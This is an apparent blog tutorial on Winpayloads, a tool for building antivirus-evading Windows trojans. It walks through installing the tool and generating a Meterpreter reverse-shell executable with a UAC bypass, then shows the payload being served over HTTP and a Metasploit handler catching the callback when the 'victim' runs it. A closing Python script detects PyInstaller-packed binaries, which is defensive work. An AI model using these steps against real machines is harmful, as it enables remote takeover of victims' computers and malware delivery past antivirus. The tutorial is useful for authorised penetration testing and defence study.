
Building AV-evading Windows trojans (Winpayloads)

July 11, 2017 · 548 characters, about a 2-minute read

Tool link

https://github.com/nccgroup/Winpayloads

Introduction

Winpayloads is an NCC Group tool for generating Windows trojans that are meant to evade antivirus. As the session below shows, it builds the chosen reverse shell or Meterpreter payload into an executable with PyInstaller, optionally hosts the result on a local web server for delivery, and starts the matching Metasploit handler for you.

Installation

Download:
git clone https://github.com/nccgroup/Winpayloads.git
cd Winpayloads
Install:
chmod +x setup.sh
./setup.sh
What it looks like when launched after installation:

   _       ___       ____              __                __
  | |     / (_)___  / __ \____ ___  __/ /___  ____ _____/ /____
  | | /| / / / __ \/ /_/ / __ `/ / / / / __ \/ __ `/ __  / ___/
  | |/ |/ / / / / / ____/ /_/ / /_/ / / /_/ / /_/ / /_/ (__  )
  |__/|__/_/_/ /_/_/    \__,_/\__, /_/\____/\__,_/\__,_/____/
                             /____/NCCGroup - CharlieDean
==================================== Main Menu ====================================
1: Windows Reverse Shell
2: Windows Meterpreter Reverse Shell [uacbypass, persistence, allchecks]
3: Windows Meterpreter Bind Shell [uacbypass, persistence, allchecks]
4: Windows Meterpreter Reverse HTTPS [uacbypass, persistence, allchecks]
5: Windows Meterpreter Reverse Dns [uacbypass, persistence, allchecks]
ps: PowerShell Menu
stager: Powershell Interpreter Stager
clients: Connected Interpreter Clients

?: Print Detailed Help
back: Main Menu
exit: Exit
===================================================================================
Main Menu > 

Usage

For example, to generate a Windows Meterpreter Reverse Shell, choose option 2 and answer the prompts:

Main Menu > 2

[*] Press Enter For Default Port(4444)
[*] Port> 4444

[*] Press Enter To Get Local Ip Automatically(1.1.1.16)
[*] IP> 
[*] IP SET AS 1.1.1.16
[*] PORT SET AS 4444

[*] Try UAC Bypass(Only Works For Local Admin Account)? y/[n]:y
[*] Creating Payload using Pyinstaller...
[*] Payload.exe Has Been Generated And Is Located Here: /root/winpayloads/Windows_Meterpreter_Reverse_Shell.exe

[*] Upload To Local Websever or (p)sexec? [y]/p/n: y

[*] Serving Payload On http://1.1.1.16:8000/Windows_Meterpreter_Reverse_Shell.exe
 _                                                    _
/ \    /\         __                         _   __  /_/ __
| |\  / | _____   \ \           ___   _____ | | /  \ _   \ \
| | \/| | | ___\ |- -|   /\    / __\ | -__/ | || | || | |- -|
|_|   | | | _|__  | |_  / -\ __\ \   | |    | | \__/| |  | |_
      |/  |____/  \___\/ /\ \\___/   \/     \__|    |_\  \___\


       =[ metasploit v4.14.27-dev                         ]
+ -- --=[ 1659 exploits - 951 auxiliary - 293 post        ]
+ -- --=[ 486 payloads - 40 encoders - 9 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

payload => windows/meterpreter/reverse_tcp
LPORT => 4444
LHOST => 0.0.0.0
autorunscript => multi_console_command -rc uacbypass.rc
ExitOnSession => false
[*] Exploit running as background job.

[*] Started reverse TCP handler on 0.0.0.0:4444 
[*] Starting the payload handler...
msf exploit(handler) > 

On the victim machine, open http://1.1.1.16:8000/Windows_Meterpreter_Reverse_Shell.exe and run the downloaded file; the Meterpreter session connects back to the handler listening on port 4444.

Assessment

In practice it does not achieve full AV evasion, probably because the tool has been public for so long, but the way it generates the trojan is very simple and worth a try.
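One reason the evasion is weak has nothing to do with the Meterpreter shellcode: the "Creating Payload using Pyinstaller..." line above means every executable Winpayloads emits is a PyInstaller one-file binary, and PyInstaller's bootloader appends a fixed-layout archive cookie that begins with the constant magic `MEI\x0c\x0b\x0a\x0b\x0e`. The script below is an added example for this post, not code from Winpayloads or from the original author; it locates and parses that cookie (the `!8sIIii64s` struct layout is PyInstaller's own) so you can check a generated sample before relying on it. The sample bytes it builds are constructed for the demonstration and are not a real executable.

```python
"""Spot PyInstaller-packed binaries, such as Winpayloads output, by
finding the bootloader's CArchive cookie.  Added example; not part of
Winpayloads."""
import struct
import sys
from pathlib import Path

# Fixed 8-byte magic at the start of the PyInstaller CArchive cookie.
PYINSTALLER_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"
# Cookie layout (network byte order): magic, package length, TOC offset,
# TOC length, Python version, 64-byte Python DLL name.
COOKIE_FORMAT = "!8sIIii64s"
COOKIE_SIZE = struct.calcsize(COOKIE_FORMAT)  # 88 bytes


def find_pyinstaller_cookie(data: bytes):
    """Return the parsed cookie as a dict, or None when the bytes carry no
    PyInstaller archive.  The cookie closes the embedded archive, which sits
    at the end of the executable, so search backwards from the end."""
    pos = data.rfind(PYINSTALLER_MAGIC)
    if pos < 0 or pos + COOKIE_SIZE > len(data):
        return None
    magic, pkg_len, toc_off, toc_len, pyvers, pylib = struct.unpack(
        COOKIE_FORMAT, data[pos:pos + COOKIE_SIZE]
    )
    return {
        "cookie_offset": pos,
        "package_length": pkg_len,
        "toc_offset": toc_off,
        "toc_length": toc_len,
        "python_version": pyvers,
        "python_lib": pylib.rstrip(b"\x00").decode("ascii", "replace"),
    }


def classify(data: bytes) -> str:
    """One-line verdict for a file's bytes."""
    if data[:2] != b"MZ":
        return "not a PE file"
    cookie = find_pyinstaller_cookie(data)
    if cookie is None:
        return "PE, no PyInstaller archive found"
    return (
        f"PE packed with PyInstaller (python_version={cookie['python_version']}, "
        f"lib={cookie['python_lib']!r}, archive={cookie['package_length']} bytes)"
    )


def make_constructed_sample(pylib: bytes = b"python27.dll") -> bytes:
    """Constructed stand-in for a Winpayloads build: an MZ header, filler,
    then a PyInstaller-style cookie.  Not a real or runnable executable."""
    filler = b"\x00" * 256
    cookie = struct.pack(COOKIE_FORMAT, PYINSTALLER_MAGIC, 1234, 100, 50, 27, pylib)
    return b"MZ" + filler + cookie


if __name__ == "__main__":
    # Usage: python pyi_check.py /root/winpayloads/Windows_Meterpreter_Reverse_Shell.exe
    paths = [Path(p) for p in sys.argv[1:]]
    if not paths:
        print("constructed sample:", classify(make_constructed_sample()))
    for p in paths:
        print(f"{p}: {classify(p.read_bytes())}")
```

Point it at the generated Windows_Meterpreter_Reverse_Shell.exe: any verdict other than "no PyInstaller archive found" means the wrapper alone identifies the file as a PyInstaller bundle, which is exactly the kind of static fingerprint antivirus engines key on before they ever look at the shellcode inside.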